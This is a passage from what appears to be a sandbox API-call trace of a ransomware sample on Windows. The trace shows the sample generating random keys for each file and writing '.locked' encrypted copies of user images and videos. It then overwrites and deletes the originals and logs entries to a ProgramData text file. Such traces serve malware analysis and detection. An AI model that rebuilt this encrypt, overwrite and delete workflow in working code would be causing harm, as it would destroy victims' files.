_a9ks\\tx9_ewqicq_n-v\\ukjrjq2ugtpgf0ar.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.619] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0314.619] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0314.619] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0314.619] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0314.620] WriteFile (in: hFile=0x1e0, lpBuffer=0x12571000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12571000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0314.627] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0314.630] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0314.630] SetEvent (hEvent=0x150) returned 1 [0314.630] SetEvent (hEvent=0x14c) returned 1 [0314.630] SetEvent (hEvent=0x20c) returned 1 [0314.630] SetEvent (hEvent=0x220) returned 1 [0314.630] ReadFile (in: hFile=0x224, lpBuffer=0x17a20000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesRead=0x125e7d68*=0x16256, lpOverlapped=0x0) returned 1 [0314.634] WriteFile (in: hFile=0x1e0, lpBuffer=0x17a20000*, nNumberOfBytesToWrite=0x16256, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesWritten=0x125e7d74*=0x16256, lpOverlapped=0x0) returned 1 [0314.680] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0314.752] ReadFile (in: hFile=0x224, lpBuffer=0x17a20000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0314.753] CloseHandle (hObject=0x1e0) returned 1 [0314.780] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0314.837] CloseHandle (hObject=0x224) returned 1 [0314.837] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0314.838] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0314.838] WriteFile (in: hFile=0x224, lpBuffer=0x126e00e0*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x126e00e0*, lpNumberOfBytesWritten=0x125e7e64*=0x66, lpOverlapped=0x0) returned 1 [0314.838] CloseHandle (hObject=0x224) returned 1 [0314.838] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\UKjRjq2UGtPGf0Ar.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\ukjrjq2ugtpgf0ar.jpg")) returned 1 [0314.895] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\UKjRjq2UGtPGf0Ar.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\ukjrjq2ugtpgf0ar.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0314.945] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.056] SetEvent (hEvent=0x214) returned 1 [0315.056] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0315.056] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.167] WriteFile (in: hFile=0x1a4, lpBuffer=0x1368e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x1368e000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.187] CloseHandle (hObject=0x1a4) returned 1 [0315.187] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\UKjRjq2UGtPGf0Ar.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\ukjrjq2ugtpgf0ar.jpg")) returned 1 [0315.248] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.363] SetEvent (hEvent=0x1e8) returned 1 [0315.364] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.371] SetEvent (hEvent=0x20c) returned 1 [0315.371] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.375] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0315.406] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\uf6wQ63liri5t-.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\uf6wq63liri5t-.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.406] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0315.406] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0315.407] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0315.408] SetEvent (hEvent=0x150) returned 1 [0315.408] SetEvent (hEvent=0x190) returned 1 [0315.408] SetEvent (hEvent=0x20c) returned 1 [0315.408] SetEvent (hEvent=0x1e8) returned 1 [0315.408] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\uf6wQ63liri5t-.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\uf6wq63liri5t-.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.408] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125dcd9c | out: lpMode=0x125dcd9c) returned 0 [0315.408] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc040 | out: pbBuffer=0x125fc040) returned 1 [0315.409] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0315.409] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0315.409] WriteFile (in: hFile=0x1e0, lpBuffer=0x12668000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x12668000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0315.410] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0315.412] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.412] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0315.412] SetEvent (hEvent=0x220) returned 1 [0315.412] SetEvent (hEvent=0x214) returned 1 [0315.412] SetEvent (hEvent=0x1e8) returned 1 [0315.413] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.413] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0315.413] SetEvent (hEvent=0x150) returned 1 [0315.413] SetEvent (hEvent=0x1e8) returned 1 [0315.413] SetEvent (hEvent=0x214) returned 1 [0315.417] ReadFile (in: hFile=0x1c0, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e3d68*=0x72e4, lpOverlapped=0x0) returned 1 [0315.419] WriteFile (in: hFile=0x1e0, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0x72e4, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x125e3d74*=0x72e4, lpOverlapped=0x0) returned 1 [0315.423] ReadFile (in: hFile=0x1c0, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0315.423] CloseHandle (hObject=0x1e0) returned 1 [0315.424] CloseHandle (hObject=0x1c0) returned 1 [0315.424] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.424] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0315.424] WriteFile (in: hFile=0x1c0, lpBuffer=0x126ae120*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x126ae120*, lpNumberOfBytesWritten=0x125e3e64*=0x55, lpOverlapped=0x0) returned 1 [0315.424] CloseHandle (hObject=0x1c0) returned 1 [0315.424] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\uf6wQ63liri5t-.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\uf6wq63liri5t-.png")) returned 1 [0315.431] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.574] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.591] SetEvent (hEvent=0x20c) returned 1 [0315.591] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0315.600] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.600] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0315.602] SetEvent (hEvent=0x190) returned 1 [0315.602] SetEvent (hEvent=0x220) returned 1 [0315.602] SetEvent (hEvent=0x1e8) returned 1 [0315.602] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.602] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0315.602] SetEvent (hEvent=0x150) returned 1 [0315.602] SetEvent (hEvent=0x1e8) returned 1 [0315.602] SetEvent (hEvent=0x220) returned 1 [0315.602] SetEvent (hEvent=0x14c) returned 1 [0315.603] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.615] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.621] SetEvent (hEvent=0x190) returned 1 [0315.621] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0315.678] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.678] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0315.685] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.685] SetEvent (hEvent=0x14c) returned 1 [0315.685] SetEvent (hEvent=0x22c) returned 1 [0315.685] SetEvent (hEvent=0x220) returned 1 [0315.685] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.686] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0315.686] SetEvent (hEvent=0x220) returned 1 [0315.686] SetEvent (hEvent=0x22c) returned 1 [0315.687] ReadFile (in: hFile=0x200, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1249cd68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x1249cd68*=0x519f, lpOverlapped=0x0) returned 1 [0315.689] WriteFile (in: hFile=0x1c8, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0x519f, lpNumberOfBytesWritten=0x1249cd74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x1249cd74*=0x519f, lpOverlapped=0x0) returned 1 [0315.692] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.760] ReadFile (in: hFile=0x200, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1249cd68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x1249cd68*=0x0, lpOverlapped=0x0) returned 1 [0315.760] CloseHandle (hObject=0x1c8) returned 1 [0315.795] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.865] CloseHandle (hObject=0x200) returned 1 [0315.865] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.865] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1249ce94 | out: lpMode=0x1249ce94) returned 0 [0315.865] WriteFile (in: hFile=0x200, lpBuffer=0x126e0150*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x1249ce64, lpOverlapped=0x0 | out: lpBuffer=0x126e0150*, lpNumberOfBytesWritten=0x1249ce64*=0x66, lpOverlapped=0x0) returned 1 [0315.866] CloseHandle (hObject=0x200) returned 1 [0315.866] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\pMFEi hP0gxXvAtY.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\pmfei hp0gxxvaty.png")) returned 1 [0315.929] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.950] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.952] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0315.996] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0316.025] SetEvent (hEvent=0x1e8) returned 1 [0316.026] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0316.026] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125dbe94 | out: lpMode=0x125dbe94) returned 0 [0316.026] WriteFile (in: hFile=0x1a4, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x125dbe64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x125dbe64*=0x40, lpOverlapped=0x0) returned 1 [0316.026] CloseHandle (hObject=0x1a4) returned 1 [0316.027] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\ldvBDUlb8N1DKZb.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\ldvbdulb8n1dkzb.gif")) returned 1 [0316.033] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0316.155] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\ldvBDUlb8N1DKZb.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\ldvbdulb8n1dkzb.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0316.565] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0316.645] SetEvent (hEvent=0x150) returned 1 [0316.645] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125dbe88 | out: lpMode=0x125dbe88) returned 0 [0316.645] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0316.726] WriteFile (in: hFile=0x19c, lpBuffer=0x157ee000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dbe78, lpOverlapped=0x0 | out: lpBuffer=0x157ee000*, lpNumberOfBytesWritten=0x125dbe78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.750] CloseHandle (hObject=0x19c) returned 1 [0316.751] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\ldvBDUlb8N1DKZb.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\ldvbdulb8n1dkzb.gif")) returned 1 [0316.814] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0317.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8060 | out: pbBuffer=0x124a8060) returned 1 [0317.001] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0317.001] WriteFile (in: hFile=0x1c8, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0317.004] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0317.009] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0317.010] SetEvent (hEvent=0x150) returned 1 [0317.010] SetEvent (hEvent=0x190) returned 1 [0317.010] SetEvent (hEvent=0x220) returned 1 [0317.010] SetEvent (hEvent=0x20c) returned 1 [0317.010] ReadFile (in: hFile=0x19c, lpBuffer=0x17334000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x17334000*, lpNumberOfBytesRead=0x12659d68*=0x3101, lpOverlapped=0x0) returned 1 [0317.011] WriteFile (in: hFile=0x1c8, lpBuffer=0x17334000*, nNumberOfBytesToWrite=0x3101, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x17334000*, lpNumberOfBytesWritten=0x12659d74*=0x3101, lpOverlapped=0x0) returned 1 [0317.046] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.164] ReadFile (in: hFile=0x19c, lpBuffer=0x17334000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x17334000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0317.164] CloseHandle (hObject=0x1c8) returned 1 [0317.192] CloseHandle (hObject=0x19c) returned 1 [0317.192] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0317.193] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0317.193] WriteFile (in: hFile=0x19c, lpBuffer=0x1239a0f0*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x1239a0f0*, lpNumberOfBytesWritten=0x12659e64*=0x2b, lpOverlapped=0x0) returned 1 [0317.193] CloseHandle (hObject=0x19c) returned 1 [0317.193] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\1rfU.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1rfu.mkv")) returned 1 [0317.394] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.501] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0317.509] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.509] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0317.509] SetEvent (hEvent=0x150) returned 1 [0317.509] SetEvent (hEvent=0x20c) returned 1 [0317.509] SetEvent (hEvent=0x1b8) returned 1 [0317.509] SetEvent (hEvent=0x198) returned 1 [0317.510] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\1rfU.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1rfu.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0317.551] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.597] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0317.597] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.618] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.618] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.643] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\4Jdh3Gyu6WoYeQm.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\4jdh3gyu6woyeqm.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0317.643] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0317.644] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\4Jdh3Gyu6WoYeQm.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\4jdh3gyu6woyeqm.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0317.653] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.723] SetEvent (hEvent=0x1e8) returned 1 [0317.723] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0317.723] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.804] SetEvent (hEvent=0x1ac) returned 1 [0317.804] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.805] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0317.819] SetEvent (hEvent=0x22c) returned 1 [0317.819] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e140 | out: pbBuffer=0x1263e140) returned 1 [0317.819] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0c0 | out: pbBuffer=0x1234e0c0) returned 1 [0317.819] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c301 | out: pbBuffer=0x1237c301) returned 1 [0317.819] WriteFile (in: hFile=0x224, lpBuffer=0x126de000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x126de000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0317.825] ReadFile (in: hFile=0x1bc, lpBuffer=0x158ca000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x158ca000*, lpNumberOfBytesRead=0x1265bd68*=0x11f0d, lpOverlapped=0x0) returned 1 [0317.829] WriteFile (in: hFile=0x224, lpBuffer=0x158ca000*, nNumberOfBytesToWrite=0x11f0d, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x158ca000*, lpNumberOfBytesWritten=0x1265bd74*=0x11f0d, lpOverlapped=0x0) returned 1 [0317.883] ReadFile (in: hFile=0x1bc, lpBuffer=0x158ca000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x158ca000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0317.883] CloseHandle (hObject=0x224) returned 1 [0317.961] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.050] SetEvent (hEvent=0x1e8) returned 1 [0318.050] CloseHandle (hObject=0x1bc) returned 1 [0318.050] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.256] CreateFileW 